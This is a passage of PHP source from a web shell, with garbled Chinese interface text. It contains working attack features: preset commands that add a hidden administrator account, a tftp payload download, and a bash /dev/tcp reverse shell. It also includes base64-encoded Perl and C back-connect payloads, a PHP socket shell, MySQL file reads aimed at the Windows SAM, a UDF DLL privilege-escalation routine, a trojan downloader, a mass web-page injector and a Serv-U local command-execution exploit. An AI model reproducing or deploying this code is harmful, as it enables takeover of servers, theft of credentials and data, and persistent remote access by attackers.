");
$newpath = explode('/', $_GET['newcopy']);
$pathr[0] = $newpath[0];
for ($i = 1; $i < count($newpath); $i++) {
$pathr[] = urlencode($newpath[$i]);
}
$newcopy = implode('/', $pathr);
@copy($p, $newcopy) ? html_a("?eanver=main&path={$pp}", $newcopy . ' ' . $msg[4]) : msg($msg[5]);
die('');
break;
case "perm":
html_n("");
break;
case "info_f":
function Info_Cfg($varname)
{
switch ($result = get_cfg_var($varname)) {
case 0:
return "No";
break;
case 1:
return "Yes";
break;
default:
return $result;
break;
}
}
function Info_Fun($funName)
{
return false !== function_exists($funName) ? "Yes" : "No";
}
$dis_func = get_cfg_var("disable_functions");
$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "�������ϴ�";
$adminmail = isset($_SERVER['SERVER_ADMIN']) ? "" . $_SERVER['SERVER_ADMIN'] . "" : "" . get_cfg_var("sendmail_from") . "";
if ($dis_func == "") {
$dis_func = "No";
} else {
$dis_func = str_replace(" ", " ", $dis_func);
$dis_func = str_replace(",", " ", $dis_func);
}
$phpinfo = !eregi("phpinfo", $dis_func) ? "Yes" : "No";
$info = array(array("������ʱ��/����ʱ��", date("Y��m��d�� h:i:s", time()) . " / " . gmdate("Y��n��j�� H:i:s", time() + 8 * 3600)), array("����������:�˿�(ip)", "" . $_SERVER['SERVER_NAME'] . ":" . $_SERVER['SERVER_PORT'] . " ( " . gethostbyname($_SERVER['SERVER_NAME']) . " )"), array("����������ϵͳ(���ֱ�\r\n��)", PHP_OS . " (" . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . ")"), array("��������������", $_SERVER['SERVER_SOFTWARE']), array("���IP", getenv('REMOTE_ADDR')), array("PHP���з�ʽ(\r\n�汾)", strtoupper(php_sapi_name()) . "(" . PHP_VERSION . ") / ��ȫģʽ:" . Info_Cfg("safemode")), array("����������Ա", $adminmail), array("���ļ�·��", __FILE__), array("����ʹ��URL���ļ�[allow_url_fopen]", Info_Cfg("allow_url_fopen")), array("������̬�������ӿ�[enable_dl]", Info_Cfg("enable_dl")), array("��ʾ������Ϣ[display_errors]", Info_Cfg("display_errors")), array("�Զ���ȫ�ֱ���[register_globals]", Info_Cfg("register_globals")), array("�Զ��ַ���ת��[magic_quotes_gpc]", Info_Cfg("magic_quotes_gpc")), array("����ڴ�ʹ����[memory_limit]", Info_Cfg("memory_limit")), array("POST����ֽ�[post_max_size]", Info_Cfg("post_max_size")), array("��������ϴ�[upload_max_filesize]", $upsize), array("���������ʱ��[max_execution_time]", Info_Cfg("max_execution_time") . "��"), array("���ú���[disable_functions]", $dis_func), array("������Ϣ����[phpinfo()]", $phpinfo), array("Ŀǰ���п���ռ�diskfreespace", intval(diskfreespace(".") / (1024 * 1024)) . 'Mb'), array("GZѹ���ļ�֧��[zlib]", Info_Fun("gzclose")), array("ZIPѹ���ļ�֧��[ZipArchive(php_zip)]", Info_Fun("zip_open")), array("IMAP�����ʼ�ϵͳ", Info_Fun("imap_close")), array("XML����", Info_Fun("xml_set_object")), array("FTP��½", Info_Fun("ftp_login")), array("Session֧��", Info_Fun("session_start")), array("Socket֧��", Info_Fun("fsockopen")), array("MySQL���ݿ�", Info_Fun("mysql_close")), array("MSSQL���ݿ�", Info_Fun("mssql_close")), array("Postgre SQL���ݿ�", Info_Fun("pg_close")), array("SQLite���ݿ�", Info_Fun("sqlite_close")), array("Oracle���ݿ�", Info_Fun("ora_close")), array("Oracle 8���ݿ�", Info_Fun("OCILogOff")), array("SyBase���ݿ�", Info_Fun("sybase_close")), array("Hyperwave���ݿ�", Info_Fun("hw_close")), array("InforMix���ݿ�", Info_Fun("ifx_close")), array("FilePro���ݿ�", Info_Fun("filepro_fieldcount")), array("DBA/DBM����", Info_Fun("dba_close") . " / " . Info_Fun("dbmclose")), array("ODBC/dBASE����", Info_Fun("odbc_close") . " / " . Info_Fun("dbase_close")), array("PREL�����[PCRE]", Info_Fun("preg_match")), array("PDF֧��", Info_Fun("pdf_close")), array("ͼ�δ���[GD Library]", Info_Fun("imageline")), array("SNMP�������Э��", Info_Fun("snmpget")));
echo '';
for ($i = 0; $i < count($info); $i++) {
echo '' . $info[$i][0] . ' | ' . $info[$i][1] . ' | ' . "\n";
}
$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
try {
$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber");
$Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
$PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
} catch (Exception $e) {
}
echo 'Terminal Service�˿�Ϊ | ' . $registry_proxystring . ' | ' . "\n";
echo 'Telnet�˿�Ϊ | ' . $Telnet . ' | ' . "\n";
echo 'PcAnywhere�˿�Ϊ | ' . $PcAnywhere . ' | ' . "\n";
echo ' ';
break;
case "cmd":
$res = '���Դ���';
$cmd = 'dir';
if (!empty($_POST['cmd'])) {
$res = Exec_Run(base64_decode($_POST['cmd']));
$cmd = htmlspecialchars(base64_decode($_POST['cmd']));
}
print <<
function sFull(i){
\tStr = new Array(11);
\tStr[0] = "dir";
\tStr[1] = "net user KillWaf 1P@ssWord /add";
\tStr[2] = "net localgroup administrators KillWaf /add";
\tStr[3] = "netstat -ano";
\tStr[4] = "ipconfig";
\tStr[5] = "copy c:\\1.php d:\\2.php";
\tStr[6] = "tftp -i {$_SERVER["REMOTE_ADDR"]} get server.exe c:\\server.exe";
\tStr[7] = "0<&123;exec 123<>/dev/tcp/{$_SERVER["REMOTE_ADDR"]}/12666; sh <&123 >&123 2>&123";
\tStr[8] = "tasklist -svc";
\tdocument.getElementById('cmd').value = Str[i];
\treturn true;
}
END;
html_base();
print <<
END;
break;
case "linux":
$yourip = isset($_POST['yourip']) ? $_POST['yourip'] : getenv('REMOTE_ADDR');
$yourport = isset($_POST['yourport']) ? $_POST['yourport'] : '12666';
$system = strtoupper(substr(PHP_OS, 0, 3));
print <<ʹ�÷�����
\t\t\t�����Լ���������"nc -vv -l 12666"
\t\t\tȻ���ڴ���д����Ե�IP,�����ӣ��˷�����ȫ��ʵ�ã�����NC������
END;
if (!empty($_POST['yourip']) && !empty($_POST['yourport'])) {
echo '';
if ($_POST['use'] == 'perl') {
$back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
echo File_Write('/tmp/envl_bc', base64_decode($back_connect_pl), 'wb') ? '����/tmp/envl_bc�ɹ� ' : '����/tmp/envl_bcʧ�� ';
$perlpath = Exec_Run('which perl');
$perlpath = $perlpath ? chop($perlpath) : 'perl';
@unlink('/tmp/envl_bc.c');
echo Exec_Run($perlpath . ' /tmp/envl_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 'nc -vv -l ' . $_POST['yourport'] : 'ִ������ʧ��';
}
if ($_POST['use'] == 'c') {
$back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
echo File_Write('/tmp/envl_bc.c', base64_decode($back_connect_c), 'wb') ? '����/tmp/envl_bc.c�ɹ� ' : '����/tmp/envl_bc.cʧ�� ';
$res = Exec_Run('gcc -o /tmp/envl_bc /tmp/envl_bc.c');
@unlink('/tmp/envl_bc.c');
echo Exec_Run('/tmp/envl_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 'nc -vv -l ' . $_POST['yourport'] : 'ִ������ʧ��';
}
if ($_POST['use'] == 'php') {
if (!extension_loaded('sockets')) {
if ($system == 'WIN') {
@dl('php_sockets.dll') or die("Can't load socket");
} else {
@dl('sockets.so') or die("Can't load socket");
}
}
if ($system == "WIN") {
$env = array('path' => 'c:\\windows\\system32');
} else {
$env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
}
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$host = $_POST['yourip'];
$port = $_POST['yourport'];
$host = gethostbyname($host);
$proto = getprotobyname("tcp");
if (($sock = socket_create(AF_INET, SOCK_STREAM, $proto)) < 0) {
die("Socket����ʧ��");
}
if (($ret = socket_connect($sock, $host, $port)) < 0) {
die("����ʧ��");
} else {
$message = "----------------------PHP��������--------------------\n";
socket_write($sock, $message, strlen($message));
$cwd = str_replace('\\', '/', dirname(__FILE__));
while ($cmd = socket_read($sock, 65535, $proto)) {
if (trim(strtolower($cmd)) == "exit") {
socket_write($sock, "Bye\n");
exit;
} else {
$process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
fwrite($pipes[0], $cmd);
fclose($pipes[0]);
$msg = stream_get_contents($pipes[1]);
socket_write($sock, $msg, strlen($msg));
fclose($pipes[1]);
$msg = stream_get_contents($pipes[2]);
socket_write($sock, $msg, strlen($msg));
$return_value = proc_close($process);
}
}
}
}
}
if ($_POST['use'] == 'nc') {
echo ' ';
$mip = $_POST['yourip'];
$bport = $_POST['yourport'];
$fp = fsockopen($mip, $bport, $errno, $errstr);
if (!$fp) {
$result = "Error: could not open socket connection";
} else {
fputs($fp, "\n*********************************************\n \r\n\t\t hacking url:http://www.phpinfo.cc is ok! \r\n\t\t\t \n*********************************************\n\n");
while (!feof($fp)) {
fputs($fp, " [r00t@H4c3ing:/root]# ");
$result = fgets($fp, 4096);
$message = `{$result}`;
fputs($fp, "--> " . $message . "\n");
}
fclose($fp);
}
echo ' ';
}
echo ' ����Գ������Ӷ˿� (nc -vv -l ' . $_POST['yourport'] . ') ';
}
break;
case "sqlshell":
$MSG_BOX = '';
$mhost = 'localhost';
$muser = 'root';
$mport = '3306';
$mpass = '';
$mdata = 'mysql';
$msql = 'select version();';
if (isset($_POST['mhost']) && isset($_POST['muser'])) {
$mhost = $_POST['mhost'];
$muser = $_POST['muser'];
$mpass = $_POST['mpass'];
$mdata = $_POST['mdata'];
$mport = $_POST['mport'];
if ($conn = mysql_connect($mhost . ':' . $mport, $muser, $mpass)) {
@mysql_select_db($mdata);
} else {
$MSG_BOX = '����MYSQLʧ��';
}
}
$downfile = 'c:/windows/repair/sam';
if (!empty($_POST['downfile'])) {
$downfile = File_Str($_POST['downfile']);
$binpath = bin2hex($downfile);
$query = 'select load_file(0x' . $binpath . ')';
if ($result = @mysql_query($query, $conn)) {
$k = 0;
$downcode = '';
while ($row = @mysql_fetch_array($result)) {
$downcode .= $row[$k];
$k++;
}
$filedown = basename($downfile);
if (!$filedown) {
$filedown = 'envl.tmp';
}
$array = explode('.', $filedown);
$arrayend = array_pop($array);
header('Content-type: application/x-' . $arrayend);
header('Content-Disposition: attachment; filename=' . $filedown);
header('Content-Length: ' . strlen($downcode));
echo $downcode;
exit;
} else {
$MSG_BOX = '�����ļ�ʧ��';
}
}
$o = isset($_GET['o']) ? $_GET['o'] : '';
print <<
��ַ
�˿�
�û�
����
����
END;
if ($o == 'u') {
$uppath = 'C:/Documents and Settings/All Users/����ʼ���˵�/����/����/exp.vbs';
if (!empty($_POST['uppath'])) {
$uppath = $_POST['uppath'];
$query = 'Create TABLE a (cmd text NOT NULL);';
if (@mysql_query($query, $conn)) {
if ($tmpcode = File_Read($_FILES['upfile']['tmp_name'])) {
$filecode = bin2hex(File_Read($tmpcode));
} else {
$tmp = File_Str(dirname(myaddress)) . '/upfile.tmp';
if (File_Up($_FILES['upfile']['tmp_name'], $tmp)) {
$filecode = bin2hex(File_Read($tmp));
@unlink($tmp);
}
}
$query = 'Insert INTO a (cmd) VALUES(CONVERT(0x' . $filecode . ',CHAR));';
if (@mysql_query($query, $conn)) {
$query = 'SELECT cmd FROM a INTO DUMPFILE \'' . $uppath . '\';';
$MSG_BOX = @mysql_query($query, $conn) ? '�ϴ��ļ��ɹ�' : '�ϴ��ļ�ʧ��';
} else {
$MSG_BOX = '������ʱ��ʧ��';
}
@mysql_query('Drop TABLE IF EXISTS a;', $conn);
} else {
$MSG_BOX = '������ʱ��ʧ��';
}
}
print << �ϴ�·��
ѡ���ļ�
END;
} elseif ($o == 'tk') {
if ($_POST['dump'] == 'dump') {
$mysql_link = @mysql_connect($mhost, $muser, $mpass);
mysql_select_db($mdata);
mysql_query("SET NAMES gbk");
$mysql = "";
$q1 = mysql_query("show tables");
while ($t = mysql_fetch_array($q1)) {
$table = $t[0];
$q2 = mysql_query("show create table `{$table}`");
$sql = mysql_fetch_array($q2);
$mysql .= $sql['Create Table'] . ";\r\n\r\n";
$q3 = mysql_query("select * from `{$table}`");
while ($data = mysql_fetch_assoc($q3)) {
$keys = array_keys($data);
$keys = array_map('addslashes', $keys);
$keys = join('`,`', $keys);
$keys = "`" . $keys . "`";
$vals = array_values($data);
$vals = array_map('addslashes', $vals);
$vals = join("','", $vals);
$vals = "'" . $vals . "'";
$mysql .= "insert into `{$table}`({$keys}) values({$vals});\r\n";
}
$mysql .= "\r\n";
}
$filename = date("Y-m-d-GisA") . ".sql";
$fp = fopen($filename, 'w');
fputs($fp, $mysql);
fclose($fp);
$tip = " ���ݱ��ݳɹ�������������ݿ��ļ���[" . $filename . "]";
} else {
$tip = "��δ���ݣ���֤����������Ŀ¼��д";
}
print <<
END;
} elseif ($o == 'd') {
print <<
�����ļ�
END;
} else {
if (!empty($_POST['msql'])) {
$msql = $_POST['msql'];
if ($result = @mysql_query($msql, $conn)) {
$MSG_BOX = 'ִ��SQL���ɹ� ';
$k = 0;
while ($row = @mysql_fetch_array($result)) {
$MSG_BOX .= $row[$k];
$k++;
}
} else {
$MSG_BOX .= mysql_error();
}
}
print <<
function nFull(i){
\tStr = new Array(11);
\tStr[0] = "select version();";
\tStr[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'";
\tStr[2] = "select '' into outfile 'F:/web/bak.php';";
\tStr[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
\tStr[4] = "select @@plugin_dir";
\tStr[5] = "select 'xxx' into dumpfile 'C:\\\\\\\\MySQL\\\\\\\\lib::\$INDEX_ALLOCATION';";
\tStr[6] = "select 'xxx' into dumpfile 'C:\\\\\\\\MySQL\\\\\\\\lib\\\\\\\\plugin::\$INDEX_ALLOCATION';";
\tnform.msql.value = Str[i];
\treturn true;
}
END;
}
if ($MSG_BOX != '') {
echo ' ' . $MSG_BOX . ' ';
} else {
echo ' ';
}
break;
case "downloader":
$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';
$Com_dpath = isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress) . '/muma.exe');
print <<
������
���ص�
END;
if (!empty($_POST['durl']) && !empty($_POST['dpath'])) {
echo '';
$contents = @file_get_contents($_POST['durl']);
if (!$contents) {
echo '����ȡҪ���ص�����';
} else {
echo File_Write($_POST['dpath'], $contents, 'wb') ? '�����ļ��ɹ�' : '�����ļ�ʧ��';
}
echo ' ';
}
break;
case "issql":
session_start();
if ($_POST['sqluser'] && $_POST['sqlpass']) {
$_SESSION['sql_user'] = $_POST['sqluser'];
$_SESSION['sql_password'] = $_POST['sqlpass'];
}
if ($_POST['sqlhost']) {
$_SESSION['sql_host'] = $_POST['sqlhost'];
} else {
$_SESSION['sql_host'] = 'localhost';
}
if ($_POST['sqlport']) {
$_SESSION['sql_port'] = $_POST['sqlport'];
} else {
$_SESSION['sql_port'] = '3306';
}
if ($_SESSION['sql_user'] && $_SESSION['sql_password']) {
if (!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))) {
unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
die(html_a('?eanver=sqlshell', '����ʧ���뷵��'));
}
} else {
die(html_a('?eanver=sqlshell', '����ʧ���뷵��'));
}
$query = mysql_query("SHOW DATABASES", $sqlcon);
html_n('���ݿ��б�:');
while ($db = mysql_fetch_array($query)) {
html_a('?eanver=issql&db=' . $db['Database'], $db['Database']);
echo ' ';
}
html_n(' | ');
if ($_GET['db']) {
css_js("3");
mysql_select_db($_GET['db'], $sqlcon);
html_n(' ');
if (!empty($_POST['sql'])) {
if (@mysql_query($_POST['sql'], $sqlcon)) {
echo "ִ��SQL���ɹ�";
} else {
echo "����: " . mysql_error();
}
}
if ($_GET['table']) {
html_n('');
$query = "SHOW COLUMNS FROM " . $_GET['table'];
$result = mysql_query($query, $sqlcon);
$fields = array();
while ($row = mysql_fetch_assoc($result)) {
array_push($fields, $row['Field']);
html_n('' . $row['Field'] . ' | ');
}
html_n(' ');
$result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
while ($text = @mysql_fetch_assoc($result)) {
foreach ($fields as $row) {
if ($text[$row] == "") {
$text[$row] = 'NULL';
}
html_n('' . $text[$row] . ' | ');
}
echo ' ';
}
} else {
$query = "SHOW TABLES FROM " . $_GET['db'];
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while ($row = mysql_fetch_row($dat)) {
html_n("" . $row[0] . " | ");
}
}
}
break;
case "upfiles":
html_n('�����������ϴ������ļ���С: ' . @get_cfg_var('upload_max_filesize') . '');
break;
case "guama":
$patht = isset($_POST['path']) ? $_POST['path'] : root_dir;
$typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";
$codet = isset($_POST['code']) ? $_POST['code'] : "";
html_n(' | �ļ���������"|"����,Ҳ������ָ���ļ���. | ');
if (!empty($_POST['path'])) {
html_n('Ŀ���ļ�:
');
if (isset($_POST['pass'])) {
$bool = true;
} else {
$bool = false;
}
do_passreturn($patht, $codet, $_POST['return'], $bool, $typet);
}
break;
case "tihuan":
html_n(' | �˹��ܿ������滻�ļ�����,��С��ʹ��.
| ');
if (!empty($_POST['path'])) {
html_n('Ŀ���ļ�:
');
if (isset($_POST['pass'])) {
$bool = true;
} else {
$bool = false;
}
do_passreturn($_POST['path'], $_POST['newcode'], "tihuan", $bool, $_POST['oldcode']);
}
break;
case "scanfile":
css_js("4");
html_n(' | �˹��ܿɺܷ��������������MYSQL�û�����������ļ�,������Ȩ. ���������ļ�̫��ʱ,��Ӱ��ִ���ٶ�,������ʹ��Ŀ¼����. | ');
if (!empty($_POST['path'])) {
html_n('�ҵ��ļ�:
');
if (isset($_POST['pass'])) {
$bool = true;
} else {
$bool = false;
}
do_passreturn($_POST['path'], $_POST['code'], $_POST['return'], $bool);
}
break;
case "scanphp":
html_n(' | ԭ���Ǹ��������붨���,��鿴�����жϺ��ٽ���ɾ��. | ');
if (!empty($_POST['path'])) {
html_n('�ҵ��ļ�:
');
if (isset($_POST['pass'])) {
$bool = true;
} else {
$bool = false;
}
do_passreturn($_POST['path'], $_POST['class'], "scanphp", $bool);
}
break;
case "port":
$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';
$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631|2049|873';
print <<
ɨ��IP
�˿ں�
END;
if (!empty($_POST['ip']) && !empty($_POST['port'])) {
echo '';
$ports = explode('|', $_POST['port']);
for ($i = 0; $i < count($ports); $i++) {
$fp = @fsockopen($_POST['ip'], $ports[$i], $errno, $errstr, 2);
echo $fp ? '���Ŷ˿� ---> ' . $ports[$i] . ' ' : '�رն˿� ---> ' . $ports[$i] . ' ';
ob_flush();
flush();
}
echo ' ';
}
break;
case "getcode":
if (isset($_POST['url'])) {
$proxycontents = @file_get_contents($_POST['url']);
echo $proxycontents ? $proxycontents : "
��ȡ URL ����ʧ�� ";
exit;
}
print <<
|
END;
break;
case "servu":
$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
print <<[ִ������] [�����û�]
';
if (!empty($_POST['SUPort']) && !empty($_POST['SUUser']) && !empty($_POST['SUPass'])) {
echo '';
$sendbuf = "";
$recvbuf = "";
$domain = "-SETDOMAIN\r\n" . "-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n" . "-TZOEnable=0\r\n" . " TZOKey=\r\n";
$adduser = "-SETUSERSETUP\r\n" . "-IP=0.0.0.0\r\n" . "-PortNo=21\r\n" . "-User=" . $_POST['user'] . "\r\n" . "-Password=" . $_POST['password'] . "\r\n" . "-HomeDir=c:\\\r\n" . "-LoginMesFile=\r\n" . "-Disable=0\r\n" . "-RelPaths=1\r\n" . "-NeedSecure=0\r\n" . "-HideHidden=0\r\n" . "-AlwaysAllowLogin=0\r\n" . "-ChangePassword=0\r\n" . "-QuotaEnable=0\r\n" . "-MaxUsersLoginPerIP=-1\r\n" . "-SpeedLimitUp=0\r\n" . "-SpeedLimitDown=0\r\n" . "-MaxNrUsers=-1\r\n" . "-IdleTimeOut=600\r\n" . "-SessionTimeOut=-1\r\n" . "-Expire=0\r\n" . "-RatioUp=1\r\n" . "-RatioDown=1\r\n" . "-RatiosCredit=0\r\n" . "-QuotaCurrent=0\r\n" . "-QuotaMaximum=0\r\n" . "-Maintenance=None\r\n" . "-PasswordType=Regular\r\n" . "-Ratios=None\r\n" . " Access=" . $_POST['part'] . "\\|RWAMELCDP\r\n";
$deldomain = "-DELETEDOMAIN\r\n" . "-IP=0.0.0.0\r\n" . " PortNo=21\r\n";
$sock = @fsockopen("127.0.0.1", $_POST["SUPort"], $errno, $errstr, 10);
$recvbuf = @fgets($sock, 1024);
echo "�������ݰ�: {$recvbuf} ";
$sendbuf = "USER " . $_POST["SUUser"] . "\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "�������ݰ�: {$sendbuf} ";
$recvbuf = @fgets($sock, 1024);
echo "�������ݰ�: {$recvbuf} ";
$sendbuf = "PASS " . $_POST["SUPass"] . "\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "�������ݰ�: {$sendbuf} ";
$recvbuf = @fgets($sock, 1024);
echo "�������ݰ�: {$recvbuf} ";
$sendbuf = "SITE MAINTENANCE\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "�������ݰ�: {$sendbuf} ";
$recvbuf = @fgets($sock, 1024);
echo "�������ݰ�: {$recvbuf} ";
$sendbuf = $domain;
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "�������ݰ�: {$sendbuf} ";
$recvbuf = @fgets($sock, 1024);
echo "�������ݰ�: {$recvbuf} ";
$sendbuf = $adduser;
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "�������ݰ�: {$sendbuf} ";
$recvbuf = @fgets($sock, 1024);
echo "�������ݰ�: {$recvbuf} ";
if (!empty($_POST['SUCommand'])) {
$exp = @fsockopen("127.0.0.1", "21", $errno, $errstr, 10);
$recvbuf = @fgets($exp, 1024);
echo "�������ݰ�: {$recvbuf} ";
$sendbuf = "USER " . $_POST['user'] . "\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo "�������ݰ�: {$sendbuf} ";
$recvbuf = @fgets($exp, 1024);
echo "�������ݰ�: {$recvbuf} ";
$sendbuf = "PASS " . $_POST['password'] . "\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo "�������ݰ�: {$sendbuf} ";
$recvbuf = @fgets($exp, 1024);
echo "�������ݰ�: {$recvbuf} ";
$sendbuf = "site exec " . $_POST["SUCommand"] . "\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo "�������ݰ�: site exec " . $_POST["SUCommand"] . " ";
$recvbuf = @fgets($exp, 1024);
echo "�������ݰ�: {$recvbuf} ";
$sendbuf = $deldomain;
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "�������ݰ�: {$sendbuf} ";
$recvbuf = @fgets($sock, 1024);
echo "�������ݰ�: {$recvbuf} ";
@fclose($exp);
}
@fclose($sock);
echo ' ';
}
break;
case "phpcode":
$phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";
if ($phpcode != 'phpinfo();') {
$phpcode = htmlspecialchars(base64_decode($phpcode));
}
echo '');
break;
case "myexp":
$MSG_BOX = '���ȵ���DLL,��ִ������.MYSQL�û�����ΪrootȨ��,����·�������ܼ���DLL�ļ�. mysql5.1�汾��������mysql���Ŀ¼��װUDF��������ʧ��������NTFS-ADS�����ܴ����ļ���';
$info = '�������';
$mhost = 'localhost';
$muser = 'root';
$mport = '3306';
$mpass = '';
$mdata = 'mysql';
$mpath = 'C:/windows/mysqlDll.dll';
$sqlcmd = 'ver';
if (isset($_POST['mhost']) && isset($_POST['muser'])) {
$mhost = $_POST['mhost'];
$muser = $_POST['muser'];
$mpass = $_POST['mpass'];
$mdata = $_POST['mdata'];
$mport = $_POST['mport'];
$mpath = File_Str($_POST['mpath']);
$sqlcmd = $_POST['sqlcmd'];
$conn = mysql_connect($mhost . ':' . $mport, $muser, $mpass);
if ($conn) {
@mysql_select_db($mdata);
if (!empty($_POST['outdll']) && !empty($_POST['mpath'])) {
$query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
if (@mysql_query($query, $conn)) {
$shellcode = Mysql_shellcode();
$query = "INSERT into Envl_Temp_Tab values (CONVERT(" . $shellcode . ",CHAR));";
if (@mysql_query($query, $conn)) {
$query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \'' . $mpath . '\';';
if (@mysql_query($query, $conn)) {
$ap = explode('/', $mpath);
$inpath = array_pop($ap);
$query = 'Create Function state returns string soname \'' . $inpath . '\';';
$MSG_BOX = @mysql_query($query, $conn) ? '��װDLL�ɹ�' : '��װDLLʧ��';
} else {
$MSG_BOX = '����DLL�ļ�ʧ��';
}
} else {
$MSG_BOX = 'д����ʱ��ʧ��';
}
@mysql_query('DROP TABLE Envl_Temp_Tab;', $conn);
} else {
$MSG_BOX = '������ʱ��ʧ��';
}
}
if (!empty($_POST['runcmd'])) {
$query = 'select state("' . $sqlcmd . '");';
$result = @mysql_query($query, $conn);
if ($result) {
$k = 0;
$info = NULL;
while ($row = @mysql_fetch_array($result)) {
$infotmp .= $row[$k];
$k++;
}
$info = $infotmp;
$MSG_BOX = 'ִ�гɹ�';
} else {
$MSG_BOX = 'ִ��ʧ��';
}
}
} else {
$MSG_BOX = '����MYSQLʧ��';
}
}
print <<
function Fullm(i){
\tStr = new Array(11);
\tStr[0] = "ver";
\tStr[1] = "net user KillWaf 1P@ssWord /add";
\tStr[2] = "net localgroup administrators KillWaf /add";
\tStr[3] = "net start Terminal Services";
\tStr[4] = "tasklist /svc";
\tStr[5] = "netstat -ano";
